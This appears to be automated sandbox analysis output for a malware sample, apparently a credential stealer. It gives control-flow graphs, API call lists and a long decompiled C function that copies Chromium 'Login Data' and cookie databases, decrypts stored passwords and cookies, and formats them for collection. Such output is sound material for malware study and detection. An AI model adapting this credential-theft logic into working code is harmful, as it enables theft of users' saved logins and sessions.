                                                                                                                                                                        control_flow_graph 2335 402cb8-402d42 call 4017fa call 401934 2344 402d44 2335->2344 2345 402d4d-402d69 2335->2345 2344->2345 2347 402d6b-402d7f call 40177f 2345->2347 2348 402d8d-402d8f 2345->2348 2347->2348 2357 402d81-402d87 StrCpyW 2347->2357 2350 402d91 2348->2350 2351 402d98-402d9c 2348->2351 2350->2351 2353 402da7-402dab 2351->2353 2354 402d9e 2351->2354 2355 402db6-402dba 2353->2355 2356 402dad 2353->2356 2354->2353 2358 402dc5-402dc7 2355->2358 2359 402dbc 2355->2359 2356->2355 2357->2348 2360 402dd0-402df0 2358->2360 2361 402dc9 2358->2361 2359->2358 2363 402df3-402e0b 2360->2363 2361->2360 2365 402e11-402ed7 call 40a69e 2363->2365 2366 402f3d-402f44 2363->2366 2381 402ed9-402ee6 2365->2381 2382 402f2f-402f30 DeleteFileW 2365->2382 2366->2363 2367 402f4a-402f4c 2366->2367 2369 402f55-402f5b 2367->2369 2370 402f4e 2367->2370 2370->2369 2381->2382 2385 402ee8-402ef7 2381->2385 2383 402f36 2382->2383 2383->2366 2385->2382 2387 402ef9-402efc 2385->2387 2387->2382 2388 402efe-402f1c 2387->2388 2390 402f5c-402f66 2388->2390 2391 402f1e-402f2e 2388->2391 2394 402f6c 2390->2394 2395 40320e-40322b DeleteFileW 2390->2395 2391->2382 2397 402f6f-402fbe 2394->2397 2395->2366 2401 403231 2395->2401 2407 4031f2-4031ff 2397->2407 2408 402fc4-402fc8 2397->2408 2401->2383 2407->2397 2412 403205-40320b 2407->2412 2409 402fd3-40301e 2408->2409 2410 402fca-402fcd 2408->2410 2409->2407 2418 403024-403065 2409->2418 2410->2407 2410->2409 2412->2395 2422 4031eb 2418->2422 2423 40306b-403097 2418->2423 2422->2407 2426 40312d-40314f 2423->2426 2427 40309d-4030c0 call 40177f 2423->2427 2430 403155-4031b4 call 40a4c2 wsprintfW lstrlenW 2426->2430 2431 4031da-4031df 2426->2431 2438 4030c2-403110 wsprintfW lstrlenW 2427->2438 2439 40311e-403122 2427->2439 2444 4031c2-4031c6 2430->2444 2445 4031b6-4031c0 call 40a503 2430->2445 2433 4031e1 2431->2433 2434 4031e8 2431->2434 2433->2434 2434->2422 2438->2439 2446 403112-40311c call 40a503 2438->2446 2439->2431 2440 403128 2439->2440 2441 4031d1 2440->2441 2441->2431 2444->2441 2448 4031c8 2444->2448 2445->2444 2446->2439 2448->2441
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402D47
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • StrCpyW.SHLWAPI(?,?), ref: 00402D87
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402D92
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DA1
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DB0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DBF
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DCA
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F30
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402F37
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402F4F
                                                                                                                                                                        • wsprintfW.USER32 ref: 00403102
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0040310C
                                                                                                                                                                        • wsprintfW.USER32 ref: 004031A6
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004031B0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004031CB
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004031D4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004031E2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004031EC
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00403223
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFilelstrlenwsprintf
                                                                                                                                                                        • String ID: Cookies$FALSE$Network\Cookies$TRUE$pXet$v10$xd
                                                                                                                                                                        • API String ID: 2479234762-659242097
                                                                                                                                                                        • Opcode ID: ca82027ae101a843b685d125fad7f84f8d5a922713a545ea654940957bcd5cc7
                                                                                                                                                                        • Instruction ID: 518071ebf78736c82c0705b89313a0bc18143e80e42b499cd2370e7bd490f6e3
                                                                                                                                                                        • Opcode Fuzzy Hash: ca82027ae101a843b685d125fad7f84f8d5a922713a545ea654940957bcd5cc7
                                                                                                                                                                        • Instruction Fuzzy Hash: A3024C71900219EFDF059FA2EE49AAE7BB5FB08301F104839E911B72A0D7759D20DF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004032C3
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403312
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403321
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403330
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040333B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403346
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040346B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403472
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040349E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004034A5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403747
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0040374E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403755
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: Web Data$pXet$v10
                                                                                                                                                                        • API String ID: 2194112602-3506904765
                                                                                                                                                                        • Opcode ID: 95a4d13152d61a2150443ef15e5531f8b924340940afcc281ea8c97043dcaaac
                                                                                                                                                                        • Instruction ID: dd7c25951b04004103893565f422d3d2245e9c7bd2d4e4275fc45d8d731e42ae
                                                                                                                                                                        • Opcode Fuzzy Hash: 95a4d13152d61a2150443ef15e5531f8b924340940afcc281ea8c97043dcaaac
                                                                                                                                                                        • Instruction Fuzzy Hash: A2F1A171900214EFDB15DFA6EE44AAE7BB9FB08311F104839F511B72A0DB759A20CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 15%
                                                                                                                                                                        			E004027B8(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				char _v9;
                                                                                                                                                                        				char _v10;
                                                                                                                                                                        				char _v11;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				WCHAR* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				void* _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				void* _v68;
                                                                                                                                                                        				char _v72;
                                                                                                                                                                        				void* _v76;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				void* _v84;
                                                                                                                                                                        				char _v88;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				intOrPtr _t118;
                                                                                                                                                                        				intOrPtr _t120;
                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				intOrPtr _t126;
                                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                                        				intOrPtr _t130;
                                                                                                                                                                        				void* _t134;
                                                                                                                                                                        				void* _t135;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				void* _t146;
                                                                                                                                                                        				void* _t153;
                                                                                                                                                                        				void* _t154;
                                                                                                                                                                        				signed int _t155;
                                                                                                                                                                        				intOrPtr _t157;
                                                                                                                                                                        				intOrPtr _t158;
                                                                                                                                                                        				void* _t160;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				WCHAR* _t165;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				void* _t174;
                                                                                                                                                                        				int _t175;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        				int _t185;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				intOrPtr* _t203;
                                                                                                                                                                        				void* _t204;
                                                                                                                                                                        				intOrPtr* _t205;
                                                                                                                                                                        				void* _t253;
                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				void* _t259;
                                                                                                                                                                        				void* _t260;
                                                                                                                                                                        				char _t261;
                                                                                                                                                                        				void* _t263;
                                                                                                                                                                        				void* _t265;
                                                                                                                                                                        				signed int _t266;
                                                                                                                                                                        				void* _t267;
                                                                                                                                                                        				intOrPtr* _t270;
                                                                                                                                                                        				void* _t271;
                                                                                                                                                                        
                                                                                                                                                                        				_t203 = __edx;
                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                        				_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_t104 =  *((intOrPtr*)( *0x40e13c))(_t103, _a12);
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t253 = _t104;
                                                                                                                                                                        				E004017FA(_t253,  &_v8,  &_v52);
                                                                                                                                                                        				 *_t270 = 0x200;
                                                                                                                                                                        				_t259 =  *((intOrPtr*)( *0x40e044))(0x40);
                                                                                                                                                                        				_v48 = _t259;
                                                                                                                                                                        				E00401934(_v8,  &_v48,  *0x40e044, _v52);
                                                                                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                                                                                        				_v60 = _t259;
                                                                                                                                                                        				_v64 = 0x200;
                                                                                                                                                                        				_t260 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_v24 = _t260;
                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        				}
                                                                                                                                                                        				_push( &_v72);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v28);
                                                                                                                                                                        				_push( &_v64);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e0b0))() != 0) {
                                                                                                                                                                        					_t199 = E0040177F(_v68,  &_v24, _v72);
                                                                                                                                                                        					_t260 = _v24;
                                                                                                                                                                        					if(_t199 != 0) {
                                                                                                                                                                        						 *_t203 =  *((intOrPtr*)( *0x40e13c))( *_t203, _t260);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v28 != 0) {
                                                                                                                                                                        					LocalFree(_v28);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v60 != 0) {
                                                                                                                                                                        					LocalFree(_v60);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v68 != 0) {
                                                                                                                                                                        					LocalFree(_v68);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t260 != 0) {
                                                                                                                                                                        					LocalFree(_t260);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t253 != 0) {
                                                                                                                                                                        					LocalFree(_t253);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t261 = _a16;
                                                                                                                                                                        				if(_t261 == 0) {
                                                                                                                                                                        					L57:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t118 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c4);
                                                                                                                                                                        					 *0x40e4d4 = _t118;
                                                                                                                                                                        					_t120 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1f8);
                                                                                                                                                                        					 *0x40e4c8 = _t120;
                                                                                                                                                                        					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1e0);
                                                                                                                                                                        					 *0x40e4bc = _t122;
                                                                                                                                                                        					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e208);
                                                                                                                                                                        					 *0x40e4c4 = _t124;
                                                                                                                                                                        					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e230);
                                                                                                                                                                        					 *0x40e4cc = _t126;
                                                                                                                                                                        					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c0);
                                                                                                                                                                        					 *0x40e4b8 = _t128;
                                                                                                                                                                        					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e224);
                                                                                                                                                                        					 *0x40e4c0 = _t130;
                                                                                                                                                                        					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1b0);
                                                                                                                                                                        					_t134 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_v32 = _t135;
                                                                                                                                                                        					_t263 =  *((intOrPtr*)( *0x40e000))(_t134, _a8, L"Login Data");
                                                                                                                                                                        					_v56 = _t263;
                                                                                                                                                                        					_t137 = E0040A69E( *0x40e000,  &_v32);
                                                                                                                                                                        					_t204 = _v32;
                                                                                                                                                                        					if(_t137 == 0) {
                                                                                                                                                                        						L59:
                                                                                                                                                                        						LocalFree(_t263);
                                                                                                                                                                        						DeleteFileW(_t204);
                                                                                                                                                                        						return LocalFree(_t204) | 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(_t204);
                                                                                                                                                                        					_push(_t263);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        						goto L59;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push( &_v24);
                                                                                                                                                                        					_push(_t204);
                                                                                                                                                                        					if( *0x40e4c8() == 0) {
                                                                                                                                                                        						if(_v24 != 0) {
                                                                                                                                                                        							_t146 =  *0x40e4d4(_v24,  *0x40e1fc, 0xffffffff,  &_a16, 0);
                                                                                                                                                                        							_t271 = _t270 + 0x14;
                                                                                                                                                                        							if(_t146 == 0) {
                                                                                                                                                                        								_push(_a16);
                                                                                                                                                                        								if( *0x40e4cc() != 0x64) {
                                                                                                                                                                        									L53:
                                                                                                                                                                        									if(_t263 != 0) {
                                                                                                                                                                        										LocalFree(_t263);
                                                                                                                                                                        									}
                                                                                                                                                                        									 *0x40e4bc(_a16);
                                                                                                                                                                        									 *0x40e4c4(_v24);
                                                                                                                                                                        									DeleteFileW(_t204);
                                                                                                                                                                        									if(_t204 != 0) {
                                                                                                                                                                        										LocalFree(_t204);
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L57;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t205 = _v44;
                                                                                                                                                                        								do {
                                                                                                                                                                        									_t153 =  *0x40e4c0(_a16, 0);
                                                                                                                                                                        									_t154 =  *0x40e4c0(_a16, 1);
                                                                                                                                                                        									_v48 = _t154;
                                                                                                                                                                        									_t155 =  *0x40e4c0(_a16, 2);
                                                                                                                                                                        									_t271 = _t271 + 0x18;
                                                                                                                                                                        									_t255 = _t155;
                                                                                                                                                                        									if(_t153 >= 1 && (_v48 >= 1 || _t255 >= 1)) {
                                                                                                                                                                        										_t157 =  *0x40e4b8(_a16, 0);
                                                                                                                                                                        										_v44 = _t157;
                                                                                                                                                                        										_t158 =  *0x40e4b8(_a16, 1);
                                                                                                                                                                        										_t271 = _t271 + 0x10;
                                                                                                                                                                        										_v40 = _t158;
                                                                                                                                                                        										if(_t255 <= 0) {
                                                                                                                                                                        											goto L51;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t265 =  *0x40e4d0(_a16, 2);
                                                                                                                                                                        										_t54 = _t255 + 0x40; // 0x40
                                                                                                                                                                        										_v36 = _t265;
                                                                                                                                                                        										_t160 =  *((intOrPtr*)( *0x40e044))(0x40, _t54);
                                                                                                                                                                        										_t161 =  *((intOrPtr*)( *0x40e050))(_t160, _t265);
                                                                                                                                                                        										_v48 = _t161;
                                                                                                                                                                        										_v12 =  *_t161;
                                                                                                                                                                        										_v11 =  *((intOrPtr*)(_t161 + 1));
                                                                                                                                                                        										_v10 =  *((intOrPtr*)(_t161 + 2));
                                                                                                                                                                        										_v9 = 0;
                                                                                                                                                                        										if(_t265 == 0) {
                                                                                                                                                                        											L50:
                                                                                                                                                                        											LocalFree(_t161);
                                                                                                                                                                        											goto L51;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t266 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
                                                                                                                                                                        										_t165 =  *0x40e1a4; // 0x647a00
                                                                                                                                                                        										_v20 = _t165;
                                                                                                                                                                        										_push("v10");
                                                                                                                                                                        										_push( &_v12);
                                                                                                                                                                        										_v8 = _t266;
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e084))() != 0) {
                                                                                                                                                                        											_push( &_v80);
                                                                                                                                                                        											_v84 = _v36;
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_v88 = 0x200;
                                                                                                                                                                        											_push( &_v88);
                                                                                                                                                                        											if( *((intOrPtr*)( *0x40e0b0))() == 0) {
                                                                                                                                                                        												_t267 = _v8;
                                                                                                                                                                        												L47:
                                                                                                                                                                        												if(_t267 != 0) {
                                                                                                                                                                        													LocalFree(_t267);
                                                                                                                                                                        												}
                                                                                                                                                                        												_t161 = _v48;
                                                                                                                                                                        												goto L50;
                                                                                                                                                                        											}
                                                                                                                                                                        											 *((char*)(_v80 + _v76)) = 0;
                                                                                                                                                                        											_t173 = E0040A4C2(_v76);
                                                                                                                                                                        											_v36 = _t173;
                                                                                                                                                                        											_t174 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _t173);
                                                                                                                                                                        											_t271 = _t271 + 0x14;
                                                                                                                                                                        											_t175 = lstrlenW(_v20);
                                                                                                                                                                        											_t267 = _v8;
                                                                                                                                                                        											if(_t174 >= _t175) {
                                                                                                                                                                        												 *_t205 = E0040A503( *_t205, _t267);
                                                                                                                                                                        											}
                                                                                                                                                                        											if(_v76 != 0) {
                                                                                                                                                                        												LocalFree(_v76);
                                                                                                                                                                        											}
                                                                                                                                                                        											LocalFree(_v36);
                                                                                                                                                                        											L39:
                                                                                                                                                                        											goto L47;
                                                                                                                                                                        										}
                                                                                                                                                                        										_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _t255 << 2);
                                                                                                                                                                        										if(E0040177F(_v36,  &_v16, _t255) == 0) {
                                                                                                                                                                        											_t267 = _v8;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t184 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _v16);
                                                                                                                                                                        											_t271 = _t271 + 0x14;
                                                                                                                                                                        											_t185 = lstrlenW(_v20);
                                                                                                                                                                        											_t267 = _v8;
                                                                                                                                                                        											if(_t184 >= _t185) {
                                                                                                                                                                        												 *_t205 = E0040A503( *_t205, _t267);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										if(_v16 == 0) {
                                                                                                                                                                        											goto L47;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											LocalFree(_v16);
                                                                                                                                                                        											goto L39;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									L51:
                                                                                                                                                                        									_push(_a16);
                                                                                                                                                                        								} while ( *0x40e4cc() == 0x64);
                                                                                                                                                                        								_t204 = _v32;
                                                                                                                                                                        								_t263 = _v56;
                                                                                                                                                                        								goto L53;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t263);
                                                                                                                                                                        							LocalFree(_t204);
                                                                                                                                                                        							 *0x40e4c4(_v24);
                                                                                                                                                                        							_t190 = 0xfffffffd;
                                                                                                                                                                        							return _t190;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t258 = 0xfffffffe;
                                                                                                                                                                        						L22:
                                                                                                                                                                        						LocalFree(_t263);
                                                                                                                                                                        						LocalFree(_t204);
                                                                                                                                                                        						return _t258;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t258 = 0xffffffffffffffff;
                                                                                                                                                                        					goto L22;
                                                                                                                                                                        				}
                                                                                                                                                                        			}






































































                                                                                                                                                                        0x004027cd
                                                                                                                                                                        0x004027cf
                                                                                                                                                                        0x004027d2
                                                                                                                                                                        0x004027de
                                                                                                                                                                        0x004027e0
                                                                                                                                                                        0x004027e7
                                                                                                                                                                        0x004027ef
                                                                                                                                                                        0x004027fa
                                                                                                                                                                        0x00402808
                                                                                                                                                                        0x00402811
                                                                                                                                                                        0x00402814
                                                                                                                                                                        0x0040281e
                                                                                                                                                                        0x0040282b
                                                                                                                                                                        0x0040282e
                                                                                                                                                                        0x0040283b
                                                                                                                                                                        0x0040283d
                                                                                                                                                                        0x00402840
                                                                                                                                                                        0x00402845
                                                                                                                                                                        0x00402845
                                                                                                                                                                        0x00402854
                                                                                                                                                                        0x00402857
                                                                                                                                                                        0x00402858
                                                                                                                                                                        0x00402859
                                                                                                                                                                        0x0040285a
                                                                                                                                                                        0x0040285e
                                                                                                                                                                        0x00402862
                                                                                                                                                                        0x00402867
                                                                                                                                                                        0x00402872
                                                                                                                                                                        0x00402877
                                                                                                                                                                        0x0040287d
                                                                                                                                                                        0x00402889
                                                                                                                                                                        0x00402889
                                                                                                                                                                        0x0040287d
                                                                                                                                                                        0x0040288f
                                                                                                                                                                        0x00402894
                                                                                                                                                                        0x00402894
                                                                                                                                                                        0x0040289e
                                                                                                                                                                        0x004028a3
                                                                                                                                                                        0x004028a3
                                                                                                                                                                        0x004028ad
                                                                                                                                                                        0x004028b2
                                                                                                                                                                        0x004028b2
                                                                                                                                                                        0x004028ba
                                                                                                                                                                        0x004028bd
                                                                                                                                                                        0x004028bd
                                                                                                                                                                        0x004028c5
                                                                                                                                                                        0x004028c8
                                                                                                                                                                        0x004028c8
                                                                                                                                                                        0x004028ce
                                                                                                                                                                        0x004028d3
                                                                                                                                                                        0x00402c97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004028d9
                                                                                                                                                                        0x004028e5
                                                                                                                                                                        0x004028ed
                                                                                                                                                                        0x004028f8
                                                                                                                                                                        0x00402900
                                                                                                                                                                        0x0040290b
                                                                                                                                                                        0x00402913
                                                                                                                                                                        0x0040291e
                                                                                                                                                                        0x00402926
                                                                                                                                                                        0x00402931
                                                                                                                                                                        0x00402939
                                                                                                                                                                        0x00402944
                                                                                                                                                                        0x0040294c
                                                                                                                                                                        0x00402957
                                                                                                                                                                        0x0040295f
                                                                                                                                                                        0x00402971
                                                                                                                                                                        0x0040297e
                                                                                                                                                                        0x0040298b
                                                                                                                                                                        0x0040299b
                                                                                                                                                                        0x004029a1
                                                                                                                                                                        0x004029a6
                                                                                                                                                                        0x004029a9
                                                                                                                                                                        0x004029ae
                                                                                                                                                                        0x004029b3
                                                                                                                                                                        0x00402c9e
                                                                                                                                                                        0x00402c9f
                                                                                                                                                                        0x00402ca6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402cb3
                                                                                                                                                                        0x004029bf
                                                                                                                                                                        0x004029c1
                                                                                                                                                                        0x004029c2
                                                                                                                                                                        0x004029c7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004029d0
                                                                                                                                                                        0x004029d1
                                                                                                                                                                        0x004029dc
                                                                                                                                                                        0x004029e7
                                                                                                                                                                        0x00402a12
                                                                                                                                                                        0x00402a18
                                                                                                                                                                        0x00402a1d
                                                                                                                                                                        0x00402a3f
                                                                                                                                                                        0x00402a4c
                                                                                                                                                                        0x00402c66
                                                                                                                                                                        0x00402c68
                                                                                                                                                                        0x00402c6b
                                                                                                                                                                        0x00402c6b
                                                                                                                                                                        0x00402c74
                                                                                                                                                                        0x00402c7d
                                                                                                                                                                        0x00402c86
                                                                                                                                                                        0x00402c8e
                                                                                                                                                                        0x00402c91
                                                                                                                                                                        0x00402c91
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c8e
                                                                                                                                                                        0x00402a52
                                                                                                                                                                        0x00402a55
                                                                                                                                                                        0x00402a5a
                                                                                                                                                                        0x00402a67
                                                                                                                                                                        0x00402a72
                                                                                                                                                                        0x00402a75
                                                                                                                                                                        0x00402a7b
                                                                                                                                                                        0x00402a7e
                                                                                                                                                                        0x00402a83
                                                                                                                                                                        0x00402a9d
                                                                                                                                                                        0x00402aa8
                                                                                                                                                                        0x00402aab
                                                                                                                                                                        0x00402ab1
                                                                                                                                                                        0x00402ab4
                                                                                                                                                                        0x00402ab9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ad0
                                                                                                                                                                        0x00402ad4
                                                                                                                                                                        0x00402ad7
                                                                                                                                                                        0x00402add
                                                                                                                                                                        0x00402ae7
                                                                                                                                                                        0x00402ae9
                                                                                                                                                                        0x00402aee
                                                                                                                                                                        0x00402af4
                                                                                                                                                                        0x00402afa
                                                                                                                                                                        0x00402afd
                                                                                                                                                                        0x00402b03
                                                                                                                                                                        0x00402c46
                                                                                                                                                                        0x00402c47
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c47
                                                                                                                                                                        0x00402b1d
                                                                                                                                                                        0x00402b1f
                                                                                                                                                                        0x00402b24
                                                                                                                                                                        0x00402b2a
                                                                                                                                                                        0x00402b2f
                                                                                                                                                                        0x00402b30
                                                                                                                                                                        0x00402b37
                                                                                                                                                                        0x00402bb6
                                                                                                                                                                        0x00402bb9
                                                                                                                                                                        0x00402bc1
                                                                                                                                                                        0x00402bc2
                                                                                                                                                                        0x00402bc3
                                                                                                                                                                        0x00402bc4
                                                                                                                                                                        0x00402bc5
                                                                                                                                                                        0x00402bc9
                                                                                                                                                                        0x00402bd0
                                                                                                                                                                        0x00402bd5
                                                                                                                                                                        0x00402c35
                                                                                                                                                                        0x00402c38
                                                                                                                                                                        0x00402c3a
                                                                                                                                                                        0x00402c3d
                                                                                                                                                                        0x00402c3d
                                                                                                                                                                        0x00402c43
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c43
                                                                                                                                                                        0x00402bdd
                                                                                                                                                                        0x00402be1
                                                                                                                                                                        0x00402bf6
                                                                                                                                                                        0x00402c00
                                                                                                                                                                        0x00402c02
                                                                                                                                                                        0x00402c0a
                                                                                                                                                                        0x00402c0e
                                                                                                                                                                        0x00402c11
                                                                                                                                                                        0x00402c1c
                                                                                                                                                                        0x00402c1c
                                                                                                                                                                        0x00402c22
                                                                                                                                                                        0x00402c27
                                                                                                                                                                        0x00402c27
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00402b50
                                                                                                                                                                        0x00402b5b
                                                                                                                                                                        0x00402b95
                                                                                                                                                                        0x00402b5d
                                                                                                                                                                        0x00402b75
                                                                                                                                                                        0x00402b77
                                                                                                                                                                        0x00402b7f
                                                                                                                                                                        0x00402b83
                                                                                                                                                                        0x00402b86
                                                                                                                                                                        0x00402b91
                                                                                                                                                                        0x00402b91
                                                                                                                                                                        0x00402b86
                                                                                                                                                                        0x00402b9c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ba2
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00402b9c
                                                                                                                                                                        0x00402c4d
                                                                                                                                                                        0x00402c4d
                                                                                                                                                                        0x00402c57
                                                                                                                                                                        0x00402c60
                                                                                                                                                                        0x00402c63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c63
                                                                                                                                                                        0x00402a20
                                                                                                                                                                        0x00402a27
                                                                                                                                                                        0x00402a30
